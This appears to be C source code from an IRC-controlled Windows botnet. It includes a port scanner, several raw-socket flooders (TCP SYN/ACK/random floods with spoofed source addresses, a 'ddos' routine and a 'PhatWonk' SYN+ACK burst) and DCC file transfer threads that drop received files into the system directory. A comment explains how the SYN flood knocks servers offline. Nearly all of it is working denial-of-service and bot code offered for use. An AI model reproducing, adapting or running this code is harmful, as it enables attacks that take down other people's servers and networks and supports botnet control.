// scan a range of IPs for an open port
DWORD WINAPI ScanThread(LPVOID param)
{
DWORD id, host;
HANDLE th;
char str[128];
SCAN scan = *((SCAN *)param);
SCAN *scans = (SCAN *)param;
scans->gotinfo = TRUE;
while(1) {
sprintf(str, "nz m (portscan.p l g) »» Scanning IP: %s, Port: %d.", finet_ntoa(scan.addy), scan.port);
strncpy(threads[scan.threadnum].name, str, sizeof(threads[scan.threadnum].name)-1);
if (th = CreateThread(NULL, 0, &ScanConnectThread, (LPVOID)&scan, 0, &id)) {
while(scan.cgotinfo == FALSE)
Sleep(50);
}
CloseHandle(th);
scans->cgotinfo = FALSE;
Sleep(scans->delay);
memcpy(&host, &scan.addy, 4);
host = fntohl(host);
host += 1;
host = fhtonl(host);
memcpy(&scan.addy, &host, 4);
}
clearthread(scan.threadnum);
return 0;
}
unsigned long AdvGetNextIP(int threadnum)
{
DWORD host;
memcpy(&host, &advinfo[threadnum].ip, 4);
host = fntohl(host);
host += 1;
host = fhtonl(host);
memcpy(&advinfo[threadnum].ip, &host, 4);
return (advinfo[threadnum].ip);
}
DWORD WINAPI TcpFloodThread(LPVOID param)
{
TCPFLOOD tcpflood = *((TCPFLOOD *)param);
TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
tcpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
srand(GetTickCount());
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
if (finet_addr(tcpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[TCP]: Invalid target IP.");
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
ipHeader.destIP=ssin.sin_addr.s_addr;
((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port)));
tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
tcpHeader.seq=fhtonl(0x12345678);
if (strstr(tcpflood.type,"syn")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strstr(tcpflood.type,"ack")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strstr(tcpflood.type,"random")) {
tcpHeader.ack_seq=rand()%3;
((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(512);
tcpHeader.urg_ptr=0;
tcpHeader.checksum=0;
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return FALSE;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=fhtons((unsigned short)TargetPort);
addr_in.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons((unsigned short)TargetPort);
tcpHeader.sport=fhtons((unsigned short)rand()%1025);
tcpHeader.seq=fhtonl(0x12345678);
/* A SYN attack simply smash its target up with TCP SYN packets.
Each SYN packet needs a SYN-ACK response and forces the server to wait for
the good ACK in reply. Of course, we just never gives the ACK, since we use a
bad IP address (spoof) there's no chance of an ACK returning.
This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs.
When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs,
and that's the end of that server until the attack is cleared up.*/
if (strcmp(Type,"ddos.syn") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strcmp(Type,"ddos.ack") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strcmp(Type,"ddos.random") == 0) {
tcpHeader.ack_seq=rand()%3;
if (rand()%2 == 0)
tcpHeader.flags=SYN;
else
tcpHeader.flags=ACK;
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while(TRUE) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
return FALSE;
SOCKET sock;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(TargetPort);
ssin.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons(TargetPort);
tcpHeader.ack_seq=0;
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.flags=2;
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while (1) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
DWORD WINAPI DCCSendThread(LPVOID param)
{
DCC dcc = *((DCC *)param);
DCC *dccs = (DCC *)param;
dccs->gotinfo = TRUE;
char sendbuf[IRCLINE],buffer[1024],tmpfile[MAX_PATH];
int Fsend, bytes_sent;
unsigned int move;
unsigned __int64 totalbytes = 0;
DWORD mode = 0;
SOCKET ssock;
while (1) {
if ((ssock = fsocket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
sprintf(sendbuf,"[DCC]: Failed to create socket.");
break;
}
SOCKADDR_IN csin, ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons(0);//random port
ssin.sin_addr.s_addr = INADDR_ANY;
if (fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin)) != 0) {
sprintf(sendbuf,"[DCC]: Failed to bind to socket.");
break;
}
int ssin_len = sizeof(ssin);
fgetsockname(ssock, (LPSOCKADDR)&ssin, &ssin_len);
unsigned short portnum = fntohs(ssin.sin_port);
for (unsigned int i=0;i <= strlen(dcc.filename); i++)
tmpfile[i] = ((dcc.filename[i] == 32)?(95):(dcc.filename[i]));
if (flisten(ssock, 1) != 0) {
sprintf(sendbuf,"[DCC]: Failed to open socket.");
break;
}
HANDLE testfile = CreateFile(dcc.filename,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
if (testfile == INVALID_HANDLE_VALUE) {
sprintf(sendbuf,"[DCC]: File doesn't exist.");
break;
}
int length = GetFileSize(testfile,NULL);
sprintf(sendbuf,"DCC SEND %s %i %i %i",dcc.filename,fhtonl(finet_addr(GetIP(dcc.sock))),portnum,length);
irc_privmsg(dcc.sock,dcc.sendto,sendbuf,FALSE);
TIMEVAL timeout;
timeout.tv_sec = 60;//timeout after 60 sec.
timeout.tv_usec = 0;
fd_set fd_struct;
FD_ZERO(&fd_struct);
FD_SET(ssock, &fd_struct);
if (fselect(0, &fd_struct, NULL, NULL, &timeout) <= 0) {
irc_privmsg(dcc.sock,dcc.sendto,"[DCC]: Send timeout.",dcc.notice);
break;
}
int csin_len = sizeof(csin);
if ((dcc.csock = faccept(ssock, (LPSOCKADDR)&csin, &csin_len)) == INVALID_SOCKET) {
sprintf(sendbuf,"[DCC]: Unable to open socket.");
break;
}
fclosesocket(ssock);
while (length) {
Fsend = 1024;
if (Fsend>length)
Fsend=length;
move = 0-length;
memset(buffer,0,sizeof(buffer));
SetFilePointer(testfile, move, NULL, FILE_END);
ReadFile(testfile, buffer, Fsend, &mode, NULL);
bytes_sent = fsend(dcc.csock, buffer, Fsend, 0);
totalbytes += bytes_sent;
if (frecv(dcc.csock,buffer ,sizeof(buffer), 0) < 1 || bytes_sent < 1) {
irc_privmsg(dcc.sock,dcc.sendto,"[DCC]: Socket error.",dcc.notice);
addlog("[DCC]: Socket error.");
fclosesocket(dcc.csock);
clearthread(dcc.threadnum);
ExitThread(1);
}
length = length - bytes_sent;
}
if (testfile != INVALID_HANDLE_VALUE)
CloseHandle(testfile);
sprintf(sendbuf,"[DCC]: Transfer complete to IP: %s, Filename: %s (%s bytes).",finet_ntoa(csin.sin_addr),dcc.filename,commaI64(totalbytes));
break;
}
if (!dcc.silent) irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice);
addlog(sendbuf);
if (ssock > 0)
fclosesocket(ssock);
fclosesocket(dcc.csock);
clearthread(dcc.threadnum);
ExitThread(0);
}
DWORD WINAPI DCCGetThread(LPVOID param)
{
DCC dcc = *((DCC *)param);
DCC *dccs = (DCC *)param;
dccs->gotinfo = TRUE;
char sendbuf[IRCLINE],buffer[4096],tmpfile[MAX_PATH];;
int received = 0;
unsigned long received2;
FILE *infile;
SOCKET ssock;
GetSystemDirectory(tmpfile, sizeof(tmpfile));
sprintf(tmpfile,"%s%s",tmpfile,dcc.filename);
while (1) {
HANDLE testfile = CreateFile(tmpfile,GENERIC_WRITE,FILE_SHARE_READ,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
if (testfile == INVALID_HANDLE_VALUE) {
sprintf(sendbuf,"[DCC]: Error unable to write file to disk.");
break;
}
CloseHandle(testfile);
if ((infile = fopen(tmpfile,"a+b")) == NULL) {
sprintf(sendbuf,"[DCC]: Error opening file for writing.");
break;
}
if ((ssock = CreateSock(dcc.host,dcc.port)) == INVALID_SOCKET) {
sprintf(sendbuf,"[DCC]: Error opening socket.");
break;
}
DWORD err = 1;
while (err != 0) {
memset(buffer,0,sizeof(buffer));
err = frecv(ssock, buffer, sizeof(buffer), 0);
if (err == 0)
break;
if (err == SOCKET_ERROR) {
sprintf(sendbuf,"[DCC]: Socket error.");
irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice);
addlog(sendbuf);
fclose(infile);
fclosesocket(ssock);
clearthread(dcc.threadnum);
ExitThread(1);
}
fwrite(buffer,1,err,infile);
received = received + err;
received2 = fhtonl(received);
fsend(ssock,(char *)&received2 , 4, 0);
}
sprintf(sendbuf,"[DCC]: Transfer complete from IP: %s, Filename: %s (%s bytes).",dcc.host,dcc.filename,commaI64(received));
break;
}
if (!dcc.silent) irc_privmsg(dcc.sock,dcc.sendto,sendbuf,dcc.notice);
addlog(sendbuf);
if (infile != NULL)
fclose(infile);
if (ssock > 0)
fclosesocket(ssock);
clearthread(dcc.threadnum);
ExitThread(0);
}
char* SendPhatWonk(unsigned long TargetIP, unsigned int len, int delay)
{
BOOL flag=TRUE;
unsigned long lTimerCount=0;
struct timespec ts;
int i=0;
struct sockaddr_in addr;
int scansock=0;
sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
fsetsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&flag, sizeof(flag));
srand(GetTickCount());
unsigned int port[28] = { 1025,21,22,23,25,53,80,81,88,110,113,119,135,
137,139,143,443,445,1024,1433,1500,
1720,3306,3389,5000,6667,8000,8080 };
unsigned int openport[28] = {0,0,0};
static char hitports[1024] = "";
int hitport=0, lastport=0;
char tmpMess[]="";
struct timeval working_timeout;
working_timeout.tv_sec = 3;
working_timeout.tv_usec = 3000;
for (i=0;i<28;i++)
{
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = TargetIP;
addr.sin_port = fhtons(port[i]);
scansock = fsocket(AF_INET,SOCK_STREAM,0);
int result = connect_no_timeout(scansock,(struct sockaddr *)&addr,sizeof(struct sockaddr),&working_timeout);
fclosesocket(scansock);
if(result == 0)
{
openport[i] = port[i];
}
}
sprintf(hitports, " ");
lTimerCount=GetTickCount();
for (i=0;i<28;i++)
{
if ((GetTickCount()-lTimerCount)/1000>len) break;
if (openport[i] != 0)
{
hitport = openport[i];
//hitports.Format("%s%d ",hitports.CStr(),hitport);
sprintf(hitports, "%s%d ", hitports, hitport);
}
else
{
hitport = fhtons (brandom (0, 65535)); // no open ports
}
}
for (;;)
{
memset(&packet, 0, sizeof(packet));
ts.tv_sec = 0;
ts.tv_nsec = 10;
packet.ip.ihl = 5;
packet.ip.ver = 4;
packet.ip.pro = IPPROTO_TCP;
packet.ip.tos = 0x08;
packet.ip.id = fhtons (brandom (1024, 65535));
packet.ip.tl = fhtons(sizeof(packet));
packet.ip.off = 0;
packet.ip.ttl = 255;
if (!spoofing)
packet.ip.src = spoofip(TargetIP);
else
packet.ip.src = finet_addr(spoof);
packet.ip.dst = TargetIP;
packet.tcp.flg = 0;
packet.tcp.win = fhtons(16384);
packet.tcp.seq = fhtonl (brandom (0, 65535) + (brandom (0, 65535) << 8));
packet.tcp.ack = 0;
packet.tcp.off = 5;
packet.tcp.urp = 0;
packet.tcp.dst = hitport;
cksum.pseudo.daddr = TargetIP;
cksum.pseudo.mbz = 0;
cksum.pseudo.ptcl = IPPROTO_TCP;
cksum.pseudo.tcpl = fhtons(sizeof(struct xtcphdr));
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = TargetIP;
s_in.sin_port = packet.tcp.dst;
for(i=0;i<1023;++i) {
/*
send 1 syn packet + 1023 ACK packets.
*/
if(i==0) {
packet.tcp.src = fhtons (brandom (0, 65535));
cksum.pseudo.saddr = packet.ip.src;
packet.tcp.flg = SYN;
packet.tcp.ack = 0;
}
else {
packet.tcp.flg = ACK;
packet.tcp.ack = fhtons (brandom (0, 65535));
}
++packet.ip.id;
++packet.tcp.seq;
s_in.sin_port = packet.tcp.dst;
packet.ip.sum = 0;
packet.tcp.sum = 0;
cksum.tcp = packet.tcp;
packet.ip.sum = checksum((unsigned short *)&packet.ip, 20);
packet.tcp.sum = checksum((unsigned short *)&cksum, sizeof(cksum));
fsendto(sock, (const char *)&packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in));
}
if((GetTickCount()-lTimerCount)/1000>len) break;
Sleep(delay);
}
return hitports;
}
